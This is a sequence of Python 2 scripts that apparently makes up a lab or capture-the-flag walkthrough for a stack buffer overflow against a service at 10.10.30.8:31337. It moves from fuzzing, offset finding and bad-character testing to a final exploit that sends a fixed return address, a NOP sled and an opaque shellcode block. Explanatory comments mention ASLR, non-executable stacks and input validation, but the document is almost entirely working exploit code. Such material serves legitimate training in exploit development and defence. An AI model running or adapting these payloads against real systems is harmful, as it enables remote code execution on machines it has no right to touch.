dostackbufferoverflow
#!/usr/bin/python
# Python 2 script (print statements, byte-string literals): it will not parse under Python 3.
# Step 1 of the walkthrough: open a TCP connection to the lab host 10.10.30.8:31337 and send
# a single 400-byte line of "A".  From the service's side this is exactly the input that
# length validation exists to reject: one line far longer than any fixed-size buffer it
# could be copied into.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name; a name like `payload` would not.
    buffer = "A" * 400
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + '\r\n')
    # close() is only on the success path; with no finally/with, an error after connect()
    # leaves the socket open.
    s.close()
    print "\nDone!"
except:
    # A bare except catches everything (a typo's NameError, KeyboardInterrupt, ...) and
    # reports all of it as a connection failure.  `except socket.error:` is the truthful catch.
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script; same connect/send/close skeleton as the 400-"A" run, but the filler is a
# non-repeating marker sequence (Aa0 Aa1 ... An2 A) instead of identical bytes.  The point of
# such a sequence is that any few consecutive bytes of it identify one position in the input.
# The later scripts split the input at 146 bytes, presumably the position this run revealed;
# the page does not show the crash output itself.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + '\r\n')
    # Not reached if send() raises: the socket is then never closed (no finally/with).
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    # `except socket.error:` would report honestly and let other errors surface.
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script.  The input is now three regions of distinguishable byte values:
# 146 x 0x41 ("A"), 4 x 0x42 ("B") and 1000 x 0x43 ("C").  Presumably the 146 comes from
# the marker run above, and the distinct values let a debugger show which region a given
# register or stack value was filled from.  The page does not show the resulting crash.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "A" * 146
    # Named after the register the author expects these 4 bytes to land in; the page does
    # not show that they do.
    eip = "B" * 4
    # Misnamed: this is trailing filler after the 4-byte marker, not an offset.
    offset = "C" * 1000
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + eip + offset + '\r\n')
    # Only reached on success; an exception after connect() leaks the socket.
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script: the previous run minus the 1000-byte "C" trailer, presumably to confirm
# that 146 + 4 bytes alone reproduce the crash.  The commented-out `offset` line is dead
# code and should be deleted rather than kept; version control holds the history.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "A" * 146
    eip = "B" * 4
    #offset = "C" * 1000
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + eip + '\r\n')
    # Only reached on success; an exception after connect() leaks the socket.
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script.  After the 146 + 4 bytes, every byte value from 0x01 to 0xff is appended
# in order.  Two values are deliberately absent: 0x00 (the list starts at 0x01) and 0x0a
# (0x09 is followed directly by 0x0b).  Both are plausible terminators for a service that
# reads a line -- the payload itself ends in '\r\n' -- but the page does not show how the
# target actually treats them, nor what this run revealed in memory.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "A" * 146
    eip = "B" * 4
    # 255 candidate byte values (0x00 and 0x0a omitted); in Python 2 each "\xNN" is one raw byte.
    badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
                "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
                "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
                "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
                "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
                "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
                "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
                "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
                "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
                "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
                "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
                "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
                "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
                "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
                "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
                "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + eip + badchars + '\r\n')
    # Only reached on success; an exception after connect() leaks the socket.
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script.  The 4-byte "B" marker is replaced by a fixed address, 0x080414C3,
# written least-significant byte first (little-endian, as a 32-bit x86 target expects).
# The page does not show what instruction lives at that address, and the second value
# noted in the comment below (080416BF) is not used.  A fixed address baked into the
# input is what this step depends on: a binary built as PIE and loaded under ASLR is at
# a different base on every run, and the hard-coded value would then point nowhere useful.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "A" * 146
    #080414C3 080416BF
    # Bytes C3 14 04 08 == 0x080414C3 in little-endian order; one raw byte per "\xNN" in Python 2.
    eip = "\xC3\x14\x04\x08"
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + eip + '\r\n')
    # Only reached on success; an exception after connect() leaks the socket.
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    print "\nCould not connect!"
#!/usr/bin/python
# Python 2 script: final input of the walkthrough.  Layout as sent: 146 x "A", the fixed
# 4-byte address 0x080414C3 (little-endian), ten 0x90 bytes, then an opaque block of
# machine-code bytes, then '\r\n'.  The page does not show what the payload bytes do, how
# they were produced, or whether the run succeeded.  Whether bytes sent over the network are
# ever executed at all depends on the target's build: a non-executable stack, or a PIE
# binary under ASLR (which invalidates the fixed address), defeats this construction
# independently of the overflow itself.  Input-length validation before the copy removes
# the overflow in the first place.
import socket
try:
    print "\nSending evil buffer..."
    # `buffer` shadows the Python 2 builtin of the same name.
    buffer = "A" * 146
    #080414C3 080416BF
    # Same fixed address as the previous script, little-endian.
    eip = "\xC3\x14\x04\x08"
    # 0x90 is the single-byte x86 NOP; ten of them precede the payload.
    nops = "\x90" * 10
    # Opaque payload bytes, reproduced as given on the page; one raw byte per "\xNN" in Python 2.
    shellcode = ("\xbd\x64\xbf\x30\xa8\xdb\xc1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
                 "\x52\x83\xea\xfc\x31\x6a\x0e\x03\x0e\xb1\xd2\x5d\x32\x25\x90"
                 "\x9e\xca\xb6\xf5\x17\x2f\x87\x35\x43\x24\xb8\x85\x07\x68\x35"
                 "\x6d\x45\x98\xce\x03\x42\xaf\x67\xa9\xb4\x9e\x78\x82\x85\x81"
                 "\xfa\xd9\xd9\x61\xc2\x11\x2c\x60\x03\x4f\xdd\x30\xdc\x1b\x70"
                 "\xa4\x69\x51\x49\x4f\x21\x77\xc9\xac\xf2\x76\xf8\x63\x88\x20"
                 "\xda\x82\x5d\x59\x53\x9c\x82\x64\x2d\x17\x70\x12\xac\xf1\x48"
                 "\xdb\x03\x3c\x65\x2e\x5d\x79\x42\xd1\x28\x73\xb0\x6c\x2b\x40"
                 "\xca\xaa\xbe\x52\x6c\x38\x18\xbe\x8c\xed\xff\x35\x82\x5a\x8b"
                 "\x11\x87\x5d\x58\x2a\xb3\xd6\x5f\xfc\x35\xac\x7b\xd8\x1e\x76"
                 "\xe5\x79\xfb\xd9\x1a\x99\xa4\x86\xbe\xd2\x49\xd2\xb2\xb9\x05"
                 "\x17\xff\x41\xd6\x3f\x88\x32\xe4\xe0\x22\xdc\x44\x68\xed\x1b"
                 "\xaa\x43\x49\xb3\x55\x6c\xaa\x9a\x91\x38\xfa\xb4\x30\x41\x91"
                 "\x44\xbc\x94\x36\x14\x12\x47\xf7\xc4\xd2\x37\x9f\x0e\xdd\x68"
                 "\xbf\x31\x37\x01\x2a\xc8\xd0\x24\xa0\xdd\x06\x51\xb4\xe1\x46"
                 "\x94\x31\x07\x2c\xc6\x17\x90\xd9\x7f\x32\x6a\x7b\x7f\xe8\x17"
                 "\xbb\x0b\x1f\xe8\x72\xfc\x6a\xfa\xe3\x0c\x21\xa0\xa2\x13\x9f"
                 "\xcc\x29\x81\x44\x0c\x27\xba\xd2\x5b\x60\x0c\x2b\x09\x9c\x37"
                 "\x85\x2f\x5d\xa1\xee\xeb\xba\x12\xf0\xf2\x4f\x2e\xd6\xe4\x89"
                 "\xaf\x52\x50\x46\xe6\x0c\x0e\x20\x50\xff\xf8\xfa\x0f\xa9\x6c"
                 "\x7a\x7c\x6a\xea\x83\xa9\x1c\x12\x35\x04\x59\x2d\xfa\xc0\x6d"
                 "\x56\xe6\x70\x91\x8d\xa2\x91\x70\x07\xdf\x39\x2d\xc2\x62\x24"
                 "\xce\x39\xa0\x51\x4d\xcb\x59\xa6\x4d\xbe\x5c\xe2\xc9\x53\x2d"
                 "\x7b\xbc\x53\x82\x7c\x95")
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.30.8", 31337))
    s.send(buffer + eip + nops + shellcode + '\r\n')
    # Only reached on success; an exception after connect() leaks the socket.
    s.close()
    print "\nDone!"
except:
    # Bare except: every failure, not just connection errors, prints "Could not connect!".
    # `except socket.error:` would report honestly and let other errors surface.
    print "\nCould not connect!"